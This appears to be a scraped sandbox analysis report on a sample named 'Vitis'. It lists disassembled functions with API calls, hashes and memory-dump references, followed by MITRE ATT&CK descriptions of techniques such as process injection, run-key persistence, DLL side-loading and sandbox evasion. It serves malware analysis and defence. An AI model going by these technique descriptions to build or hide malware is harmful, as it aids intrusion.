Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID:
API String ID: 2584051700-0
Opcode ID: 80dbc2b2fae4c7c566210f3db186a97745b6b4268190bf82bcd042cd3ccc65f3
Instruction ID: 4fb721614cfc657e7ae40bea064ac1047d1e810b67000393f6ef8132d91dbde4
Opcode Fuzzy Hash: 80dbc2b2fae4c7c566210f3db186a97745b6b4268190bf82bcd042cd3ccc65f3
Instruction Fuzzy Hash: E101D471940651EFEB006BB4AE8ABEA3FB0AF15305F10497AF541B61E2CAB90404DB2C

Uniqueness

Uniqueness Score: -1.00%

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
Instruction ID: 9cc957e5ccccb3d4664e0e2a58dae5c7f5d60dbdf5ff161d76b900271ba72f5e
Opcode Fuzzy Hash: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
Instruction Fuzzy Hash: B9219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404D10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
wsprintfW.USER32 ref: 00404DBA
SetDlgItemTextW.USER32(?,00423708), ref: 00404DCD

Strings

%u.%u%s%s, xrefs: 00404D9B

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 86e502d9a8370dbc93398d3fbd174d64265af359c40653ed6c33f1a653f0c3b2
Instruction ID: e9142b657f1eeb4cf11744ba9db0a0194b5dde25e0a765d2a17d7598676c161e
Opcode Fuzzy Hash: 86e502d9a8370dbc93398d3fbd174d64265af359c40653ed6c33f1a653f0c3b2
Instruction Fuzzy Hash: E911D8736041283BDB10666D9C45FAE3298DF81338F254237FA25F61D1D978D82182D8

Uniqueness

Uniqueness Score: -1.00%

Function 00405A38 Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,00437800), ref: 00405A7B
GetLastError.KERNEL32 ref: 00405A8F
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405AA4
GetLastError.KERNEL32 ref: 00405AAE

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID:
API String ID: 3449924974-0
Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction ID: 227e2837d2f0abbefd05ded2a29fab346f6aadb36d837cb996d7b4b6dfe3b4b1
Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction Fuzzy Hash: A7010C71D00219EEDF009B90D948BEFBBB8EB04314F00413AD945B6181D77896488FE9

Uniqueness

Uniqueness Score: -1.00%

Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000,004031F7,00000001,?,?,?,?,?,00403847,?), ref: 0040302C
GetTickCount.KERNEL32 ref: 0040304A
CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,00403847,?), ref: 00403075

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
Instruction ID: a5ec5a94053ed6ec85071f05b03f47ec4a0cd54214f56ca0ac695578935c79f2
Opcode Fuzzy Hash: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
Instruction Fuzzy Hash: 44F05430603620EBC2316F10FD0898B7B69FB04B43B424C7AF041B11A9CB7609828B9C

Uniqueness

Uniqueness Score: -1.00%

Function 004054DD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040550C
CallWindowProcW.USER32(?,?,?,?), ref: 0040555D

Part of subcall function 004044AF: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1

Strings

, xrefs: 004054ED

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
Instruction ID: 896dd7550c11452a1c115f53988c63f353f89721b9370a05553ad38a214c3fb8
Opcode Fuzzy Hash: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
Instruction Fuzzy Hash: 1601B171200609BFDF219F11DC81A6B3A27FB84354F100036FA01762D5C77A8E52DE5A

Uniqueness

Uniqueness Score: -1.00%

Function 00406026 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00406044
GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,?,004034F5,00437000,00437800,00437800,00437800,00437800,00437800,00437800,004037DA), ref: 0040605F

Strings

nsa, xrefs: 00406033

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction ID: f6a7e3e28ef10c8b5a356f390c602f787c019cac788ca5903e6ee53affe9a5d3
Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction Fuzzy Hash: 92F09076B40204BBEB00CF59ED05E9EB7BCEB95750F11803AEA05F7140E6B09D648768

Uniqueness

Uniqueness Score: -1.00%

Function 00407033 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
Instruction ID: a7cd93b13192ddc82b920214167f5e61206f8c8658b3f9d41a1d2146159b2bab
Opcode Fuzzy Hash: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
Instruction Fuzzy Hash: 7DA15571E04229CBDB28CFA8C8446ADBBB1FF44305F14816ED856BB281C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00407234 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
Instruction ID: 8a2c3c043c9bb5ba2b5721dff60c2e2798a6d81db984abdc297d3eb4e69e55d3
Opcode Fuzzy Hash: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
Instruction Fuzzy Hash: 11911170D04229CBEF28CF98C8947ADBBB1FB44305F14816ED856BB291C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406F4A Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
Instruction ID: 00773887ea3243dfb52df8404d42644f62a25abb174058b9e5a1e26f950428c6
Opcode Fuzzy Hash: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
Instruction Fuzzy Hash: 27813671D04229CFDF24CFA8C8847ADBBB1FB44305F24816AD856BB281C7786A86DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00406A4F Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
Instruction ID: 0eb50412ba17cbd686f9e43e0b7d85c943a315db4d9133bb66c32ce13943f697
Opcode Fuzzy Hash: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
Instruction Fuzzy Hash: E7813471E04229DBDF24CFA9C8447ADBBB0FB44305F24816ED856BB281C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406E9D Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
Instruction ID: 6da958b06032b63f13a44664be3ec753dd66a0d9f0ebc92e4dfa00afb32c2233
Opcode Fuzzy Hash: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
Instruction Fuzzy Hash: 677123B1D04229CBDF24CFA8C8847ADBBF1FB44305F14816AE856B7281D7386A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406FBB Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
Instruction ID: e79abdf9917e1b0942e39fca47e1ede282e873968176da0823b4a4e8bca0445d
Opcode Fuzzy Hash: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
Instruction Fuzzy Hash: 0A712371E04229CBDB28CF98C884BADBBB1FB44305F14816EE856B7291C7786986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406F07 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
Instruction ID: 82756e30bcf828709d5cbcfbd5bc5585b8b9ec353a8eaca6552b8bf5b5cc12a5
Opcode Fuzzy Hash: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
Instruction Fuzzy Hash: 70713371E04229CBDF28CF98C844BADBBB1FB44305F14816EE856B7291C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00405F5C Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405F84
CharNextA.USER32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F95
lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E

Memory Dump Source

Source File: 00000007.00000002.2925954415.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2925938561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925971497.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2925987686.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2926020074.00000000004AF000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_Vitis.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction ID: 4f09c4eeff833ffafa08c7ff84761216a5ad6e9a06c03d1ebffd7ec4ed62f0c5
Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction Fuzzy Hash: 53F06231505818FFD7029FA5DD04D9EBBA8EF06254B2540AAE940F7250D678DE019BA9

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
